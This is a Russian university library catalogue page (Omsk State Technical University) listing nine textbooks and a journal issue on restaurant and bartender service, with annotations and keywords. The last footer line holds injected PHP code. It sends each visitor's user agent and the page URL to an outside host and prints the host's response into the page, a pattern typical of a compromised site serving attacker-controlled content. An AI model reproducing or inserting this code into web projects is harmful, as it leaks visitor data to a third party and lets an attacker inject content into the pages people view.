Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

282 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=БАРМЕН")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 9
1. 
Главчева С. И. Организация производства и обслуживание в ресторанах и барах [Текст] / С. И. Главчева, Л. Е. Чередниченко, 2012. - 205 с.
Ключевые слова 
ПИТАНИЕ ОБЩЕСТВЕННОЕ -- БИЗНЕС РЕСТОРАННЫЙ -- РЕСТОРАЦИЯ РУССКАЯ -- РЕСТОРАЦИЯ ЗАРУБЕЖНАЯ -- РЕСТОРАН - ИСТОРИЯ -- РЕСТОРАН -- БАР -- ПОСУДА СТОЛОВАЯ -- ПОСУДА ФАРФОРОВАЯ -- ПОСУДА ФАЯНСОВАЯ -- ПОСУДА ХРУСТАЛЬНАЯ -- ПОСУДА СТЕКЛЯННАЯ -- ПОСУДА МЕТАЛИЧЕСКАЯ -- БЕЛЬЕ СТОЛОВОЕ -- СЕРВИРОВКА СТОЛА -- ОРГАНИЗАЦИЯ ПРОИЗВОДСТВА -- ЦЕХ ДОГОТОВКИ -- ЦЕХ ОБРАБОТКИ ЗЕЛЕНИ -- ОРГАНИЗАЦИЯ ТРУДА -- ЦЕХ ГОРЯЧИЙ -- ЦЕХ ХОЛОДНЫЙ -- ОРГАНИЗАЦИЯ ОБСЛУЖИВАНИЯ -- ВСТРЕЧА ПОТРЕБИТЕЛЕЙ -- ПРИЕМ ЗАКАЗА -- РАСЧЕТ С ПОСЕТИТЕЛЯМИ -- ЗАМЕНА ПОСУДЫ -- МЕНЮ РЕСТОРАНА -- КАРТА ВИН -- КАРТА СИГАРНАЯ -- КАРТА КАЛЬЯННАЯ -- КАЛЬЯН -- ПОДАЧА БЛЮД -- БАНКЕТ -- БАНКЕТ - ФУРШЕТ -- БАНКЕТ - КОКТЕЙЛЬ -- КОФЕ - BREAK -- БАНКЕТ - ЧАЙ -- ФОНДЮ -- СТОЛ ШВЕДСКИЙ -- ОБСЛУЖИВАНИЕ ПРАЗДНИЧНЫХ ВЕЧЕРОВ -- КЕЙТЕРИНГ -- ПЕРСОНАЛ ОБСЛУЖИВАЮЩИЙ -- ПЕРСОНАЛ РЕСТОРАНА -- МЕТРДОТЕЛЬ -- ОФИЦИАНТ -- БАРМЕН

В учебном пособии описана организация обслуживания потребителей в ресторанах и барах с учетом современных требований рынка, отечественного и зарубежного опыта, рассмотрены особенности проведения различных мероприятий и банкетов. Представлена организация проведения новых видов обслуживания по типу «сырной тележки», кейтеринга, предложены примеры написания винной, сигаретной, коньячной и кальянной карт. Приведены описания состава и организации работы производственных помещений и помещений для потребителей, их оснащения современным оборудованием, мебелью, а также характеристика различных видов ресторанной и барной посуды и белья.

Пособие предназначено для студентов вузов, а также работников предприятий общественного питания.

2. 
Барановский В. А. Официант-бармен [Текст] / В. А. Барановский ; дар. В. А. Козлова, 2000. - 317, [1] с.
Держатели документа (Информация об экземплярах) 

Эта книга - ответ на запрос времени. Современное российское общественное питание претерпевает существенные изменения, в результате которых формируются новые предприятия, в которых клиент должен быть обслужен по европейским стандартам. Для этого нужны другие официанты, другие бармены - люди, определяющие лицо фирмы. Как стать таким, как соответствовать новым требованиям? Об этом рассказывается в нашей книге.

Для учащихся колледжей и средних профессиональных технических училищ.

3. 
Питание и общество. - Журнал, 2004г. № 2
Оглавление 
  • Румянцева, Е. Государственная Дума. Будет ли лучше работа ее нового депутатского корпуса? / Е. Румянцева. - с.2-3
  • Борба с коррупцией. - с.4-5
  • Конкурсы, аттестации и запреты для государственных служащих. - с.5
  • Румянцева, Е. Успеха не ждут, а добиваются / Е. Румянцева. - с.8-10
    Кл. слова: Психология успеха, ПСИХОЛОГИЯ БИЗНЕСА
  • Морозова, Е. Самооценка студента: возможная причина конфликтов / Е. Морозова. - с.10-11
    Кл. слова: САМООЦЕНКА студента
  • Мещерякова, В. "Здоровое питание" - это полезный хлеб / В. Мещерякова. - с.16
  • Сучкова, Е. Салон шоколада в Париже глазами участника / Е. Сучкова. - с.28-29
  • Мироевская, Н. Вот такой у нас бармен. Супермен / Н. Мироевская. - с.32
    Кл. слова: БАРМЕН - одежда
4. 
Ридель Х. Бары и рестораны : техника обслуживания / Х. Ридель ; пер. с англ. М. В. Павлова, 2005. - 351 с.
5. 
Обслуживание на предприятиях общественного питания [Текст] : учеб. пособие для колледжей и проф.-техн. лицеев, уч-щ / сост. Л. А. Радченко, 2001. - 372 с.
6. 
Панова, Лидия Александровна. Обслуживание на предприятиях общественного питания [Текст] : учеб. пособие в экзаменац. вопр. и ответах / Л. А. Панова, 2003. - 301, [1] с.
Держатели документа (Информация об экземплярах) 

В учебном пособии изложены основные вопросы по организации обслуживания в соответствии с государственными требованиями к уровню подготовки выпускников колледжей, готовящих специалистов для предприятий общественного питания.

Подача материала в форме экзаменационных вопросов и ответов и тестовый материал, закрепляющий знания, позволят успешно усвоить курс по обслуживанию на предприятиях общественного питания.

Учебное пособие может быть использовано как во время аудиторной подготовки, так и и самостоятельного изучения материала.

7. 
Кулькова Л. В. Приготовление коктейлей и других смешанных напитков [Текст] : Учеб. пособие / Л. В. Кулькова, 2002. - 376 с.
8. 
Барановский В. А. Официант-бармен [Текст] : учеб. пособие для учащихся учеб. заведений начального проф. образования / В. А. Барановский, Л. В. Кулькова, 2002. - 347 с.
Ключевые слова 
ОФИЦИАНТ-бармен -- ПРЕДПРИЯТИЕ ОБЩЕСТВЕННОГО ПИ -- ЦЕХ ОВОЩНОЙ -- ЦЕХ МЯСНОЙ -- ЦЕХ РЫБНЫЙ -- ЦЕХ ГОРЯЧИЙ -- ЦЕХ ХОЛОДНЫЙ -- МОЕЧНАЯ КУХОННОЙ ПОСУДЫ -- РАЗДАТОЧНАЯ -- ХОЗЯЙСТВО СКЛАДСКОЕ -- БРАКЕРАЖ -- ПОМЕЩЕНИЕ ТОРГОВОЕ -- ИНТЕРЬЕР РЕСТОРАНА -- БУФЕТ -- БАР -- МАШИНА КОНТРОЛЬНО-КАССОВАЯ -- СЕРВИЗНАЯ -- МОЕЧНАЯ СТОЛОВОЙ ПОСУДЫ -- МЕНЮ -- ПОСУДА СТОЛОВАЯ -- БЕЛЬЕ СТОЛОВОЕ -- ЗАЛ ТОРГОВЫЙ -- СЕРВИРОВКА СТОЛА -- КУЛЬТУРА ПОВЕДЕНИЯ официанта -- ОБСЛУЖИВАНИЕ РЕСТОРАННОЕ -- БАНКЕТ -- БАНКЕТ - ЧАЙ -- БАНКЕТ- ПРИЕМ -- БАНКЕТ - ФУРШЕТ -- БАНКЕТ - КОКТЕЙЛЬ -- БАРМЕН -- БУФЕТ бар -- Банкет с частичным обслуживанием -- ОБСЛУЖИВАНИЕ ИНТУРИСТОВ -- СТОЛ ШВЕДСКИЙ -- КУХНЯ алжирская -- Кухня английская -- Кухня американская -- Кухня канадская -- Кухня арабская -- Кухня болгарская -- Кухня югославская -- Кухня венгерская -- Кухня индийская -- Кухня иранская -- Кухня итальянская -- Кухня немецкая -- Кухня польская -- Кухня румынская -- Кухня скандинавская -- КУХНЯ ФРАНЦУЗСКАЯ -- Кухня чешская -- Кухня южноамериканская -- Кухня японская -- РЕКЛАМА - РЕСТОРАН -- ОХРАНА ТРУДА
9. 
Барановский, Виктор Александрович. Официант-бармен [Текст] : Учеб. пособие для нач. проф. образования / В. А. Барановский, Л. В. Кулькова, 2001. - 346, [1] с.
Держатели документа (Информация об экземплярах) 

Эта книга - ответ на запрос времени. Современное российское общественное питание претерпевает существенные изменения, в результате которых формируются новые предприятия, в которых клиент должен быть обслужен по европейским стандартам.

Для этого нужны другие официанты, другие бармены - люди, определяющие лицо фирмы. Как стать таким, как соответствовать новым требованиям? Об этом рассказывается в нашей книге.



    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 3215 - 29.03.2020
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 0.76 с.14 запросов, 0.52c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;